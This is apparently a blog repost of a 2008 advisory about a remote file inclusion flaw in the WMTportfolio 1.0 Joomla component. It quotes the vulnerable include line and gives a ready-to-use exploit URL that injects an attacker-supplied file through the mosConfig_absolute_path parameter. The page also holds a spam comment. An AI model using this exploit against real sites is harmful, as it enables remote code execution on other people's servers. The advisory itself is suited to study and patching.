WMTportfolio Joomla Component 1.0

WMTportfolio Joomla Component 1.0 - RFI

on October 28, 2008


[o] wmtportfolio joomla component 1.0 Remote File Include Vulnerability
Software : com_wmtportfolio version 1.0
Download : http://www.webmaster-tips.net/
Author   : NoGe


[o] Vulnerable file
administrator/components/com_wmtportfolio/admin.wmtportfolio.php
include( $mosConfig_absolute_path . "/components/com_wmtportfolio/additems.php" );


[o] Exploit
http://localhost/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4497

Comments

labatterie said…

I did need to buy a good house for my corporation but I didn’t have enough cash and couldn’t order anything.

December 2, 2010 at 9:01 PM

Research Blog

Search This Blog

LFI to RCE via access_log injection

WMTportfolio Joomla Component 1.0 - RFI

Comments